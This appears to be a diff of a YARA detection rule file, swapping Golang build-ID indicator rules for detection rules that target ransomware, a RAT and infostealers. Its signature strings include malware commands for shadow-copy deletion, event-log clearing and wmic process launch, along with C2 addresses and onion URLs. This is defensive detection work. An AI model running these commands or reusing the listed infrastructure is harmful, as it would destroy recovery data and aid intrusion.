+		$s3 = "If you want to restore them, install ICQ" ascii
+		$s4 = "Write to our ICQ @" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $s* ) ) or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nemty : FILE
+rule DITEKSHEN_MALWARE_Win_Locked : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects Locked ransomware"
 		author = "ditekSHen"
-		id = "512fe910-e38c-513c-b678-a0592bdc4ae2"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "ad2f91ab-9bbb-5d47-a5c3-5a38dbab2ebe"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1575-L1588"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9098-L9114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "246766ab1d2871b5c22323f622d39ce9fa9b46a2d43bace122ed5549484f3aac"
+		logic_hash = "b838b996946fb268c66bac68d5e326ff3049340dfb08f2e0a77492df49915d5a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"R6dvaUktgv2SjVXDoMdo/kKgwagwoLRC88DpIXAmx/eipNq7_PQCTCOhZ6Q74q/RHJkCaNdTbd6qgYiA-EC\"" ascii
-		$s2 = "Go build ID: \"vsdndTwlj03gbEoDu06S/anJkXGh7N08537M0RMms/VG58d99axcdeD_z1JIko/tfDVbCdWUId-VX90kuT7\"" ascii
-		$s3 = "Go build ID: \"FG9JEesXBQ04oNCv2bIS/MmjCdGa3ogU_6DIz6bZR/AjrqKBSezDfY1t7U9xr-/-06dIpZsukiVcN0PtOCb\"" ascii
-		$s4 = "Go build ID: \"MJ8bS1emWrrlXiE_C61E/A6GaZzhLls_pFKMGfU1H/ZgswGQy_lzK-I4cZykwm/8JzjhV06jZosSa5Qih5O\"" ascii
-		$s5 = "Go build ID: \"_vQalVQKn2O8kxxA4vVM/slXlklhnjEF5tawjlPzW/t26rDRURK6ii0MqU7gIx/MNq6vj_uM15RhjVC2QuX\"" ascii
-		$s6 = "Go build ID: \"KWssFDTp6mq16xlI5c0t/mQLgof0oyp-eYKqNYUFL/Np8S71zE5W5_BsJCpjsj/hXpFDaVCtay2509R05fd\"" ascii
+		$x1 = "http://xxxx.onion/xxxx-xxxx-xxxx-xxxx" ascii
+		$x2 = "http://pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion" ascii
+		$x3 = "dHA6Ly94eHh4Lm9uaW9uL3h4eHgteHh4eC14eHh4LXh4eHg" ascii
+		$s1 = "choice /t 1 /d y /n >nul" ascii
+		$s2 = ".locked" fullword ascii
+		$s3 = "c:\\system volume information" fullword ascii
+		$s4 = "__$$RECOVERY_README$$__.html" fullword ascii
+		$s5 = "Trunc..." fullword ascii
+		$s6 = /C:\\windows\\temp\\[a-z0-9A-Z]{6}\.tmp/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( #s6 > 1 and 4 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Qnapcrypt : FILE
+rule DITEKSHEN_MALWARE_Win_Maze : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects Maze ransomware"
 		author = "ditekSHen"
-		id = "4cdea15f-d8fd-5720-ba25-eb60e9b0f9ce"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1590-L1598"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9116-L9145"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3ee583c395701350c091041a72f988d1b5ae607b642b42152fcda29f9be63e2"
+		logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"XcBqbQohm7UevdYNABvs/2RcJz1616naXSRu2xvTX/b6F3Jt1-5WAIexSyzeun/MpHqs5fJA5G2D9gVuUCe\"" ascii
+		$x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii
+		$s1 = "\"%s\" shadowcopy delete" wide
+		$s2 = "[%windir%\\system32\\wbem\\wmic" wide
+		$s3 = "process call create \"cmd /c start %s\"" wide
+		$s4 = "DECRYPT-FILES.html" fullword wide
+		$s5 = "Dear %s, your files" wide
+		$s6 = "%s! Alert! %s! Alert!" wide
+		$s7 = "%BASE64_PLACEHOLDER%" fullword ascii
+		$s8 = "-orDGorX0or" fullword ascii
+		$s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31
+               0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73
+               0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e
+               65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69
+               76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20
+               48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41
+               67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20
+               25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
+               3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65
+               6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63
+               74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65
+               0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e
+               74 2d 4c 65 6e 67 74 68 3a 20 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Snatch : FILE
+rule DITEKSHEN_MALWARE_Win_Teslarevenge : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects TeslaRevenge ransomware"
 		author = "ditekSHen"
-		id = "6ab6b7bc-c905-5ff9-8059-a2d512ba13b3"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "13e5bb15-47eb-5e49-a1a5-3d51cacede2f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1600-L1610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9147-L9167"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a19c791ed0d829c4c97e35cfa604a8716bad3f02632712903d765db95ba87f6"
+		logic_hash = "0f68eae8a076d00c8d058ec148d3557f5770dc827d4690b931faf98797426dbc"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"8C2VvDTH-MuUPx8tL42E/PWF9iuE2j_Zt0ANsTlty/c64swZ5TtuaIpHuEFmga/6sS0KWNryc-YAduDnWWO\"" ascii
-		$s2 = "Go build ID: \"UBrfJ_wztDfCHWakqvlV/LhzfkJwvKFrNhKCHtU9_/sveCupt8GVbvu6WZiyA-/GcimfL_TPl6FTPPriBDr\"" ascii
-		$s3 = "Go build ID: \"5zCy9jt7UZaIs5YPk4tt/1Yt6v7gCpDG---pRFyW-/7729nLSeKJik31ftz_Ve/Z5EVG3lWak3ynxNrJ4ih\"" ascii
+		$s1 = "autospreadifnoav=" ascii wide
+		$s2 = "autospread=" ascii wide
+		$s3 = "noencryptext=" ascii wide
+		$s4 = "teslarvng" wide
+		$s5 = "finished encrypting" wide nocase
+		$s6 = "net scan" wide nocase
+		$s7 = "for /f %%x in ('wevtutil el') do wevtutil cl" ascii
+		$s8 = "tasklist | find /i \"SDELETE.exe\"" ascii
+		$e1 = "mshta.exe" ascii wide nocase
+		$e2 = "sc.exe" ascii wide nocase
+		$e3 = "vssadmin.exe" ascii wide nocase
+		$e4 = "wbadmin.exe" ascii wide nocase
+		$e5 = "cmd.exe" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $e* ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Godownloader : FILE
+rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects LokiLocker ransomware"
 		author = "ditekSHen"
-		id = "da53c062-4a55-543d-b2b6-52acdf13febc"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1612-L1622"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9169-L9194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e0f5ee6ade4608a8b5c5bd02bf5aef0fcb9cb1fe1cc3a9d00b1ace91e5d0d33f"
+		logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"1OzJqWaH4h1VtrLP-zk8/G9w32ha7_ziW1Fa-0Byj/gLtfhbXZ6i_W0e5e_tFF/ekG0n9hOcZjmwzRQnRqC\"" ascii
-		$s2 = "Go build ID: \"kKxyj14l4NhGbuhOgzef/ab_yr_pUn6q2idYdoBhn/hFAjO_Yxc_rN6mHFuHM9/SmS3qmOyJBc_4xV_qg3B\"" ascii
-		$s3 = "Go build ID: \"MiW7XJnQsBXxlBHro8GW/HMqQknRgJg-mCXomgFRt/88ccKMrfA_s6AcOJs3aM/jSUAU_l3RrMzlV6ANEYE\"" ascii
+		$x1 = "SOFTWARE\\Loki" fullword wide
+		$x2 = "Cpriv.Loki" fullword wide
+		$x3 = "Loki/" wide
+		$x4 = /loki(\s)?locker/ fullword wide nocase
+		$s1 = "Restore-My-Files.txt" wide
+		$s2 = "loading encryption keys" wide
+		$s3 = "Kill switch -> enabled" wide
+		$s4 = "ScanSMBShares" fullword ascii
+		$s5 = "RewriteMBR" fullword ascii
+		$s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii
+		$n1 = "unique-id=" ascii wide
+		$n2 = "&disk-size=" ascii wide
+		$n3 = "&user=Darwin&cpu-name=" ascii wide
+		$n4 = "&ram-size=" ascii wide
+		$n5 = "&os-name=" ascii wide
+		$n6 = "&chat-id=" ascii wide
+		$n7 = "&msg-id=" ascii wide
+		$n8 = "&elapsed-time=" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $s* ) or 6 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $n* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Ranumbot : FILE
+rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Attemp at hunting for DazzleSpy"
 		author = "ditekSHen"
-		id = "f368cd9d-f974-56cf-a2b5-bd300f30cedc"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1624-L1633"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9196-L9210"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3d0ba55ca2be1b11ebf1b82490c5d26f2b35958b31a7e55892e27f24bf4118f"
-		score = 75
-		quality = 75
+		logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470"
+		score = 50
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"hOhuOA4W60aBBRoFQTDA/dl9DuLAgEcabYGK6ZT2t/ECsse3630jV_957OqqK3/ZRA_JRPFzxutK16zlEcM\"" ascii
-		$s2 = "Go build ID: \"NivDrAudWE-E6xtBXeww/3pv6fDzDqt4v0YxoTkPt/8vd79TNE-9Bt38ftxf_V/_GNqnqEUsRf-WTSmn8dM\"" ascii
+		$x1 = "/osxrk_commandline/" ascii wide nocase
+		$x2 = "/Users/wangping/pangu/" ascii wide nocase
+		$s1 = "heartbeat" ascii wide
+		$s2 = "scanFiles" ascii wide
+		$s3 = "restartCMD" ascii wide
+		$s4 = "downloadFile" ascii wide
+		$s5 = "RDPInfo" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0xfacf and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Banload : FILE
+rule DITEKSHEN_MALWARE_Win_Bhunt : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects BHunt infostealer"
 		author = "ditekSHen"
-		id = "5955afd5-f26f-5df1-b355-b8f168b694b0"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1635-L1643"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9212-L9233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "534de1ce161e5e27f380f96b83630aa75031f268658aa7e8ff8ecce82ed5d4cd"
+		logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"a3629ee6ab610a57f242f59a3dd5e5f6de73da40\"" ascii
+		$x1 = "BHUNT.Resources.resources" fullword ascii
+		$x2 = "//minecraftsquid.hopto.org/" wide
+		$s1 = "chaos_crew" ascii wide
+		$s2 = "golden7" ascii wide
+		$s3 = "mrpropper" ascii wide
+		$s4 = "/ifo.php?" ascii wide
+		$s5 = "bonanza=:=" ascii wide
+		$s6 = "blackjack=:=" ascii wide
+		$s7 = "SendPostData" fullword ascii
+		$c1 = "cmd /c REG ADD" wide
+		$c2 = "taskkill /F /IM" wide
+		$c3 = "cmd.exe /c wmic" wide
+		$g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii
+		$g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and ( 5 of ( $s* ) or 2 of ( $c* ) ) ) or ( 6 of ( $s* ) and 2 of ( $c* ) ) or ( all of ( $g* ) and 2 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Hive : FILE
+rule DITEKSHEN_MALWARE_Win_Lorenz : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in Hive ransomware"
+		description = "Detects Lorenz ransomware"
 		author = "ditekSHen"
-		id = "7d7f7757-de7b-52a7-aab0-8fda38a86fd1"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1645-L1653"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9235-L9265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f311a3661ea3a26ebca6cd283d1e219011acfdfbb13fa8b919ca2724b9f4aae7"
+		logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"XDub7DGmWVQ2COC6W4If/XHMqRPf2lnJUiVkG1CR6/u_MaUU0go2UUmLb_INuv/WrZSyz-WMW1st_NaM935\"" ascii
+		$x1 = "143.198.117.43" fullword ascii
+		$x2 = "157.90.147.28" fullword ascii
+		$x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
+		$x4 = "http://lorenz" ascii
+		$x5 = "\\lora\\Release\\lora.pdb" ascii
+		$x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii
+		$x7 = "/USER:'HOMEOFFICE.COM\\" ascii
+		$x8 = "/USER:'Sentinel.com\\" ascii
+		$s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide
+		$s2 = "*it == '\\0'" fullword wide
+		$s3 = "process call create 'cmd.exe /c" ascii
+		$s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii
+		$s5 = "HELP_SECURITY_EVENT.html" ascii
+		$s6 = "<br>[+] Whats Happen?" ascii
+		$s7 = /\.Lorenz\.sz\d+$/ fullword ascii
+		$s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii
+		$s9 = ".Speak(\"You've been hack" ascii nocase
+		$s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii
+		$n1 = "ame_serv=" ascii
+		$n2 = "&ip=" ascii
+		$n3 = "&winver=Windows" ascii
+		$n4 = "&list_drive=" ascii
+		$n5 = "&file=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $n* ) and 2 of them ) or ( 1 of ( $x* ) and 6 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nodachi : FILE
+rule DITEKSHEN_MALWARE_Win_Blackcat : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in Nodachi"
+		description = "Detects BlackCat ransomware"
 		author = "ditekSHen"
-		id = "9d578768-7995-5fb0-8bf1-9c2221cdef80"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "b6831d84-40d7-52ae-8c4d-30b087b0007b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1655-L1666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9267-L9289"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "177269623e0f3850c37c6b203d9a637fa92c0ed3fa823cc8d885f28cb383bf7d"
+		logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"3AAyhKK0wFfCYLdz5oRV/zKyiBHCsAEyDIWhaW5AW/Rb8NLT3q8A2OLm6izDGP/8G9k_gjOTX_PXKna_IMj\"" ascii
-		$s2 = "Go build ID: \"-eyFd8kbpwxUsutpqZn_/vqzQXX5Ra4qk1XHoqocW/wd-6gLzQKZyEyhVp7qOj/Jr14hyc7pLLgeIZNbfLD\"" ascii
-		$s3 = "Go build ID: \"xDSqp4KGmd0SAf5irMGh/-kA7PGjKoJcvCgsZDStn/lHeQ1LQOVyQB2NnwIwFP/-D5oEBc23ND7IGLTESdM\"" ascii
-		$s4 = "Go build ID: \"67RcwNspLH__QJrElMcB/zMJf7Go1s0ZoXqd30Lb_/NaJl4rfcuLEG5LeZ-Y4k/MzFNvW79enRRdx3LmA47\"" ascii
+		$x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii
+		$x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii
+		$s1 = "encrypt_app::windows" ascii
+		$s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii
+		$s3 = "uac_bypass::shell_exec=" ascii
+		$s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii
+		$s5 = "masquerade_peb" ascii
+		$s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii
+		$s7 = ".onion/?access-key=${ACCESS_KEY}" ascii
+		$s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii
+		$s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii
+		$s10 = /enum_(shares|servers)_sync::ok/ fullword ascii
+		$s11 = "hidden_partitions::mount_all::mounting=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gobrut : FILE
+rule DITEKSHEN_MALWARE_Win_Timetime : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in GoBrut"
+		description = "Detects TimeTime ransomware"
 		author = "ditekSHen"
-		id = "65953012-fc84-50d0-b769-64df66d8a54b"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1668-L1676"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9311-L9327"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "40c305f019cb31222fa75a24315764cb5e5356afaa72aefb59916d615a8fca28"
+		logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"sf_2_ylcjquGBe4mQ99L/aPvdLbM2z9HfoDN3RazG/8bhYeVA67N-ifbDYCDJe/UZzCu_EFL9f10gSfO4L0\"" ascii
+		$s1 = "@_DECRYPTOR_@" ascii wide
+		$s2 = "@__RECOVER_YOUR_FILES__@" wide
+		$s3 = "\\TimeTime.pdb" ascii
+		$s4 = "runCommand" fullword ascii
+		$s5 = "decryptor_file_name" fullword ascii
+		$s6 = "encryption_hiding_process" fullword ascii
+		$s7 = "admin_hiding_process" fullword ascii
+		$s8 = "security_vaccine" fullword ascii
+		$s9 = "EncrFiles_Load" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Biopassdropper : FILE
+rule DITEKSHEN_MALWARE_Win_Strifewater : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in BioPass dropper"
+		description = "Detects StrifeWater RAT"
 		author = "ditekSHen"
-		id = "b82d34d9-7774-5f99-9d76-b5426e015981"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1678-L1686"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9329-L9354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3b586e886b9f901dde1c73aa07ce0d45e4ff417459f298094359ec1c1e02e522"
+		logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"OS0VlkdEIlcl3WDDr9Za/_oVwEipaaX6V4mEEYg2V/PytlyeIYgV65maz4wT2Y/IQvgbHv3bbLV42i10qq2\"" ascii
+		$s1 = "example/1.0" fullword wide
+		$s2 = "coname:" fullword ascii
+		$s3 = "*elev:" fullword ascii
+		$s4 = "*uname:" fullword ascii
+		$s5 = "--BoundrySign" ascii
+		$s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii
+		$s7 = "9c4arSBr32g6IOni" fullword ascii
+		$pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii
+		$xn1 = "techzenspace.com" fullword wide
+		$xn2 = "87.120.8.210" wide
+		$xn3 = "192.168.40.27" wide
+		$n1 = /RVP\/index\d+\.php/ fullword wide
+		$n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii
+		$n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii
+		$n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii
+		$n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii
+		$n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
+		$n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $xn* ) or 6 of ( $s* ) or 6 of ( $n* ) or ( 1 of ( $xn* ) and 4 of them ) or ( $pdb and 4 of them ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rhysida
+rule DITEKSHEN_MALWARE_Win_Surtr : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Rhysida ransomware"
-		author = "ditekShen"
-		id = "7ee0fb41-9267-5b65-ada3-229f2e390da6"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Surtr ransomware. Ransom note is similar to LockFile"
+		author = "ditekSHen"
+		id = "7a31415d-5c03-5537-9adb-65e637f9fa0e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1688-L1697"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9356-L9378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3e07bab2982a30a5372e6708ede6707d132d410aa5b5b1a29bdb5d06910a88e"
+		logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "SethZemlak@onionmail.org" ascii wide nocase
-		$s2 = "JacquieKunze@onionmail.org" ascii wide nocase
